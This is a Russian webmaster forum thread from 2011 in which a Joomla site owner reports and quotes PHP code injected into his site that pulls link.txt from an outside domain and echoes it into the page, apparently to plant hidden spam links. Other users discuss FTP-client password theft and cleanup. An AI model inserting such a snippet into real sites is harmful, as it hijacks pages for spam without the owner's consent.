X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Стороннее вмещательство и как с ним бороться, Внедрение чужеродных кодов
Armal
Armal
Topic Starter сообщение 22.2.2011, 20:23; Ответить: Armal
Сообщение #1


Участник
***

Группа: User
Сообщений: 222
Регистрация: 16.7.2008
Из: Москва
Поблагодарили: 44 раза
Репутация:   -1  


Ночью при контрольном обходе заметил стороннее вмешательство в работу сайта, шапку перекоробило минут на десять, потом все встало на место.
Так как сам в текущий день действий с сайтом не производил, провел ревизию и обнаружил вставку кода:

<?php } ?><? $url = "http://foxmagazin.ru/link.txt"; $homepage = file_get_contents ('http://foxmagazin.ru/link.txt'); $Headers = @get_headers($url);
if(preg_match("|200|", $Headers[0])) { echo $homepage;} ?>

прямо под шапкой сайта. Код был удален, пароли заменены.
Сайт у меня используется не для продажи ссылок, коды для продажи не устанавливал точно, остается одно - кто то какими то средствами попал в святую-святых любого сайтостроителя!
Сталкиваюсь с таким впервые, подскажите, как это называется на Сео сленге, как с этим бороться и какие меры можно предпринять к такому сео-мастеру-паразиту, ежели вычислить?


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
opariks
opariks
сообщение 22.2.2011, 21:10; Ответить: opariks
Сообщение #2


Участник
***

Группа: Banned
Сообщений: 226
Регистрация: 13.1.2010
Поблагодарили: 35 раз
Репутация:   2  


Вы бы описали подробнее о своем сайте, какая CMS и т.д. Доступ к сайту у вас или еще у кого? Может вовсе взлом был не с сайта, а через ваш компьютер? Подробнее пожалуйста.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
isay777
isay777
сообщение 22.2.2011, 21:21; Ответить: isay777
Сообщение #3


Новичок
*

Группа: User
Сообщений: 24
Регистрация: 24.1.2011
Поблагодарили: 6 раз
Репутация:   0  


Была подобная проблема боролся неделю.
оказалось это вирус засел в ДВУХ!!! фтп клиентах в filezille и cuteftp и все пароли сколько бы не менял передавал хозяину. Мой запускал бота через ай пи украины.
Спасло полная чистка от вирусов снос всех фтп клиентов под 0 (совсем под 0, вместе с хистори и т.д.) замена всех паролей и от панелей и от фтп.
Чистка всех зараженных сайтов. Если что есть специальны скрипты, ну или ctrl+f.

Удачи в чистке. (если что пиши - дам скрипт и пару советов)

PS не доверяю теперь фтп клиентам.

Сообщение отредактировал isay777 - 22.2.2011, 21:22
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Armal
Armal
Topic Starter сообщение 22.2.2011, 21:53; Ответить: Armal
Сообщение #4


Участник
***

Группа: User
Сообщений: 222
Регистрация: 16.7.2008
Из: Москва
Поблагодарили: 44 раза
Репутация:   -1  


JOOMLA, доступ только у меня, по FTP захожу через Total Commander, на компе Norton AntiVirus лицензия.

Сообщение отредактировал Armal - 22.2.2011, 21:54


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
lamensel
lamensel
сообщение 22.2.2011, 21:57; Ответить: lamensel
Сообщение #5


Старожил
******

Группа: Active User
Сообщений: 1571
Регистрация: 19.11.2010
Из: той страны, где вас нет
Поблагодарили: 458 раз
Репутация:   68  


Не храните пароли от фтп в истории.
С такой штукой, как у вас еще ни разу не сталкивался к счастью.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
EvilGomel
EvilGomel
сообщение 22.2.2011, 22:00; Ответить: EvilGomel
Сообщение #6


!Тунеядец!
*******


Группа: Active User
Сообщений: 4464
Регистрация: 13.5.2009
Из: Гомель
Поблагодарили: 965 раз
Репутация:   109  


по FTP захожу через Total Commander


Главная ошибка!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Maxim-KL
Maxim-KL
сообщение 22.2.2011, 22:03; Ответить: Maxim-KL
Сообщение #7


MaximGroups.net
******

Группа: Banned
Сообщений: 1423
Регистрация: 24.9.2010
Из: localhost
Поблагодарили: 436 раз
Репутация:   122  


Вот люблю я таких людей Total Commander еще установите антивирус Avast и вы просто мечта для взломщиков .


--------------------
Забанен за мошенничество
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Armal
Armal
Topic Starter сообщение 22.2.2011, 23:21; Ответить: Armal
Сообщение #8


Участник
***

Группа: User
Сообщений: 222
Регистрация: 16.7.2008
Из: Москва
Поблагодарили: 44 раза
Репутация:   -1  


(Maxim-KL @ 22.2.2011, 21:03) *
Вот люблю я таких людей Total Commander еще установите антивирус Avast и вы просто мечта для взломщиков .


Антивирь у меня достойный, а тоталом для меня удобнее всего, скажи какой антивирь у тебя и чем заходишь на сервер, а то как то на флуд смахивает.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
phpsin
phpsin
сообщение 23.2.2011, 14:51; Ответить: phpsin
Сообщение #9


Бывалый
****

Группа: User
Сообщений: 351
Регистрация: 19.1.2010
Поблагодарили: 123 раза
Репутация:   40  


1. Не когда не храните пароли на компе
2. Используйте более менее нармальный антивирусник хотябы Каспера
3. Проведите небольшой анализ: Откройте файл http://foxmagazin.ru/link.txt при просмотре html кода вы увидите
<a href="http://lifedn.ru"></a>
<a href="http://isvalaam.ru"></a>

Проверьте эти три домена по whois и Вы увидете, что все они пренадлежат одному и тому же человеку, плюс там же есть данные об этом человеке, что делать дальше решать Вам...

PS: Но не стоит забывать и о том, что этого человека могли и подставить данным образом, и он такой же пострадавший как и Вы...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
isay777
isay777
сообщение 24.2.2011, 14:42; Ответить: isay777
Сообщение #10


Новичок
*

Группа: User
Сообщений: 24
Регистрация: 24.1.2011
Поблагодарили: 6 раз
Репутация:   0  


Да кстати про тотал командер мне то же говорили - что очень не надежен. Ключи держит там где легко достать.

Я теперь пароли руками ввожу с блокнота. Пока не надоело. Не знаю на сколько меня хватит.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Как установить источник заражения сайтов?
5 kelevra 280 Сегодня, 17:55
автор: Nell
Горячая тема (нет новых ответов) Как быстро похудеть мужчине в домашних условиях?
бесплатно, без регистрации, без смс
211 Silverspam 13337 Сегодня, 16:48
автор: Catherine_Molli
Открытая тема (нет новых ответов) Как правильно сделать категории на сайте?
Хелппп!!!
5 norino 619 Сегодня, 16:28
автор: One_on_One
Открытая тема (нет новых ответов) Как привязать меню к кнопке <nav> ?
2 pippak 864 Сегодня, 15:57
автор: Nell
Горячая тема (нет новых ответов) Как заработать новичку?
103 Emeralda 17496 Сегодня, 15:25
автор: vsemmoney


 



RSS Текстовая версия Сейчас: 11.12.2017, 19:36
Дизайн